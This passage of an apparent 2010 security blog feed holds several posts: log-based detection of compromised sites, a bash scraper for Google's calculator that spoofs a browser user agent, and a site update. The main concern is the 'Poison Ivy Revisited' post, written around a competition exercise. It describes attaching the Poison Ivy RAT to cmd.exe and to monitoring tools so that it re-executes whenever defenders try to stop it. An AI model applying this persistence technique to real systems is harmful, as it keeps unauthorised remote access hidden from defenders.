<p>Now if we were malicious we could use Google or your favorite security site to research known vulnerabilities for osCommerce to compromise the site as well. You could also do additional research on the site to help gain more of a idea of how the attack was carried out and maybe even the version of the software they are running be it osCommerce or something else like phpBB.</p>
<p>Though since we are good folks we will contact the site owners and let them know about the compromise. We also blocked the blocked the source IP address as well.</p>
<p>If you want to quickly analyze your logs for things like this I would suggest using a little command line fu on your favorite Linux distribution. For example:</p>
<p>cat /var/log/httpd/access_log | grep *.txt | grep –v robots.txt</p>
<p>This will display all the access attempts that have .txt and not any attempts for robots.txt.</p>
<p>As always I hope this provided you with some useful information. If you have any questions please feel free to let us know.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F01%2Fusing-your-web-server-logs-to-find-compromised-web-servers%2F&amp;title=Using%20your%20web%20server%20logs%20to%20find%20compromised%20web%20servers" id="wpa2a_92"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/01/using-your-web-server-logs-to-find-compromised-web-servers/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Poison Ivy Revisited</title>
		<link>http://www.digitaloffensive.com/2010/01/poison-ivy-revisited/</link>
		<comments>http://www.digitaloffensive.com/2010/01/poison-ivy-revisited/#comments</comments>
		<pubDate>Mon, 25 Jan 2010 18:06:28 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=103</guid>
		<description><![CDATA[Poison Ivy Revisited Over a year ago I wrote a post on the Poison Ivy Trojan (Tool) by the team over at http://poisonivy-rat.com. The original post can be found here http://digitaloffensive.genxweb.net/2009/09/fun-with-poison-ivy/. I wanted to take a few minutes to add another function I discovered at the last CCDC that made this tool that much better. [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Poison Ivy Revisited</strong></p>
<p>Over a year ago I wrote a post on the Poison Ivy Trojan (Tool) by the team over at <a title="http://poisonivy-rat.com" href="http://poisonivy-rat.com/" target="_blank">http://poisonivy-rat.com</a>. The original post can be found here <a href="http://digitaloffensive.genxweb.net/2009/09/fun-with-poison-ivy/">http://digitaloffensive.genxweb.net/2009/09/fun-with-poison-ivy/</a>. I wanted to take a few minutes to add another function I discovered at the last CCDC that made this tool that much better.</p>
<p>If you read my original post on this tool at the link above you will see in the third paragraph where it says “Screen 3” I mention how you can inject this into processes. Not only does it inject into the process but every time the process is called Poison Ivy is re-executed.  Now this was helpful because most of the kids at the CCDC were expecting to see Poison Ivy used again as it was in the past and they had a good idea on how to find it and stop it. So we had to become craftier then them. So I decided to attach it to the cmd.exe as well as the security tools they were using to monitor our connections such as TCPview and TCPKiller. This allowed Poison Ivy to continue running every time they tried to stop us.</p>
<p>This brings up another good point when ever doing forensics work on a computer that may be infected either check the md5 sum of the tools that you are using on the machine or bring your own tools to run on a non writeable media. This will make sure that you are not causing any additional damage and that the results you are receiving are correct and not altered.</p>
<p>As I play with this more and as it is warranted I will add additional Tips about this powerful RAT. IF you have any questions or concerns please feel free to contact me.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F01%2Fpoison-ivy-revisited%2F&amp;title=Poison%20Ivy%20Revisited" id="wpa2a_94"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/01/poison-ivy-revisited/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Google Calculator Scraper</title>
		<link>http://www.digitaloffensive.com/2010/01/google-calculator-scraper/</link>
		<comments>http://www.digitaloffensive.com/2010/01/google-calculator-scraper/#comments</comments>
		<pubDate>Fri, 15 Jan 2010 19:07:08 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=97</guid>
		<description><![CDATA[Recently I was reading an article about using Ruby on Rails to create a web scraper as I sat there and learned Ruby I got really excited to jump to the point and build a web scraper. Though as any programmer knows that is not possible until you have the base understanding of the language [...]]]></description>
			<content:encoded><![CDATA[<p>Recently I was reading an article about using Ruby on Rails to create a web scraper as I sat there and learned Ruby I got really excited to jump to the point and build a web scraper. Though as any programmer knows that is not possible until you have the base understanding of the language down. So to solve my dilemma I set forth to try to write one via a shell script.<br />
I was not sure what I wanted to scrap so after a few hours of thinking I decided to basically make a calculator using Google’s calculator feature.  Basically a user will be able to do basic arithmetic for any two numbers and get the answer via Google. If you want to try this manually go to Google and type 1+2 and hit enter. It is that simple, well close to that simple.<br />
To start off I ran several different manual tests to see what the URL should look like depending on the operator I used. I found out that all operators acted like they should accept addition the “+” gets converted to “%2B” this proposed a small issue but nothing that a little extra scripting could not resolve.<br />
To get around this and to make the program interactive for the user I did this:</p>
<blockquote><p>#!/bin/bash<br />
#######################################<br />
## Simple Google Query and web scraper<br />
## Written by Michael LaSalvia<br />
## http://www.digitaloffensive.com<br />
## Created: 1/15/09<br />
#######################################<br />
##Variables<br />
tFile=gmath.txt<br />
oFile=rmath.txt<br />
rm $tFile<br />
echo &#8220;If there was a error above this line that is ok&#8221;<br />
echo &#8220;###################################&#8221;<br />
echo &#8220;# Press (a) for addition          #&#8221;<br />
echo &#8220;# Press (s) for subtraction       #&#8221;<br />
echo &#8220;# Press (m) for multiplication    #&#8221;<br />
echo &#8220;# Press (d) for division          #&#8221;<br />
echo &#8220;###################################&#8221;</p>
<p>echo -e &#8220;What do you want to do:&#8221;<br />
read Mmath<br />
case $Mmath in<br />
&#8220;a&#8221;) dMath=%2B &amp;&amp; echo &#8220;You chose addition&#8221;;;<br />
&#8220;s&#8221;) dMath=- &amp;&amp; echo &#8220;You chose subtration&#8221;;;<br />
&#8220;m&#8221;) dMath=* &amp;&amp; echo &#8220;You chose multiplication&#8221;;;<br />
&#8220;d&#8221;) dMath=/ &amp;&amp; echo &#8220;You chose divsion&#8221;;;<br />
esac</p></blockquote>
<p>Now that we know what arithmetic the end user wants to do we need to find out what variables they want to use. To do this we do this:</p>
<blockquote><p>echo -e &#8220;Enter first number:&#8221;<br />
read nNum1<br />
echo -e &#8220;Enter Second number:&#8221;<br />
read nNum2</p></blockquote>
<p>Now that we have all the needed variables comes the fun part. We now need to construct the URL, but since it is Google and they do not allow automated responses we need to make our script look like a real user agent as well. (<span style="color: #ff0000;"><strong>WARNING: </strong></span>This may break Google’s AUP). To do this we used the following code:</p>
<blockquote><p>wget &#8211;header=&#8221;User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)&#8221; &#8220;http://www.google.com/search?hl=en&amp;safe=off&amp;q=$nNum1$dMath$nNum2&#8243; -q -O $tFile</p></blockquote>
<p>The user agent we chose to masquerade as was Internet Explorer 8. You will also notice that we outputted the file to a “known” file. This makes the rest of the process much easier and simpler to code.<br />
Now that we have the full page downloaded we need to find just the information we want. To do this I first manually reviewed the source code of the page and notice that no matter what math problem I entered the source code always had the following around each problem EX.</p>
<p>Code: style=&#8221;font-size: 138%;&#8221;&gt;&lt;b&gt;999 + 998 = 1&lt;font size=&#8221;-2&#8243;&gt; &lt;/font&gt;997&lt;/b&gt;</p>
<p>So to remove everything except what I wanted I used the following code:</p>
<blockquote><p>cat $tFile | awk -F &#8220;138%\&#8221;&gt;&lt;b&gt;&#8221; {&#8216;print $2&#8242;} | awk -F &#8220;&lt;/b&gt;&#8221; {&#8216;print $1&#8242;} &gt; $oFile<br />
echo &#8220;Your answer is:&#8221; &amp;&amp; cat $oFile</p></blockquote>
<p>You will notice that I did not clean the file fully, that is because I noticed that when it was echoed to the terminal the html that was left did not show and instead of sitting there using “sed” to fully clean it up I left it as is.<br />
I hope you have learned something from this. If you have any questions or concerns please feel free to contact me.</p>
<p>Here is a screen shot:</p>
<p><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/01/math.jpg" target="_blank"><img class="alignleft size-medium wp-image-100" title="math" src="http://www.digitaloffensive.com/wp-content/uploads/2010/01/math-232x300.jpg" alt="" width="139" height="180" /></a></p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F01%2Fgoogle-calculator-scraper%2F&amp;title=Google%20Calculator%20Scraper" id="wpa2a_96"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/01/google-calculator-scraper/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Updates: 1/15/10</title>
		<link>http://www.digitaloffensive.com/2010/01/updates-11510/</link>
		<comments>http://www.digitaloffensive.com/2010/01/updates-11510/#comments</comments>
		<pubDate>Fri, 15 Jan 2010 14:52:02 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=92</guid>
		<description><![CDATA[Well it’s been a slow few months now and not much to write about or time to research topics to write about. So if you have any ideas thoughts of something you like to know more about let me know and if I choose your topic I will post the results of my research here. [...]]]></description>
			<content:encoded><![CDATA[<p>Well it’s been a slow few months now and not much to write about or time to research topics to write about. So if you have any ideas thoughts of something you like to know more about let me know and if I choose your topic I will post the results of my research here.</p>
<p>I have updated the WordPress code on the site as well as added WordPress Security scanner to detect malicious files and help to thwart any hack attempts. I have also added a share mod to this site so you can instantly post my posts to Facebook, Twitter, Digg and so on.<br />
Till next time take care.</p>
<div id="_mcePaste" style="overflow: hidden; position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px;"><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves /> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:DontVertAlignCellWithSp /> <w:DontBreakConstrainedForcedTables /> <w:DontVertAlignInTxbx /> <w:Word11KerningPairs /> <w:CachedColBalance /> </w:Compatibility> <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val="&#45;-" /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--><!--  /* Font Definitions */  @font-face 	{font-family:"Cambria Math"; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:1; 	mso-generic-font-family:roman; 	mso-font-format:other; 	mso-font-pitch:variable; 	mso-font-signature:0 0 0 0 0 0;} @font-face 	{font-family:Calibri; 	panose-1:2 15 5 2 2 2 4 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1073750139 0 0 159 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:""; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoPapDefault 	{mso-style-type:export-only; 	margin-bottom:10.0pt; 	line-height:115%;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.0in 1.0in 1.0in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --><!--[if gte mso 10]> <mce:style><!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin-top:0in; 	mso-para-margin-right:0in; 	mso-para-margin-bottom:10.0pt; 	mso-para-margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:"Times New Roman"; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin;} --> <!--[endif]--></p>
<p class="MsoNormal">Well it’s been a slow few months now and not much to write about or time to research topics to write about. So if you have any ideas thoughts of something you like to know more about let me know and if I choose your topic I will post the results of my research here.</p>
<p class="MsoNormal">I have updated the WordPress code on the site as well as added WordPress Security scanner to detect malicious files and help to thwart any hack attempts. I have also added a share mod to this site so you can instantly post my posts to Facebook, Twitter, Digg and so on.</p>
<p class="MsoNormal">Till next time take care.</p>
</div>
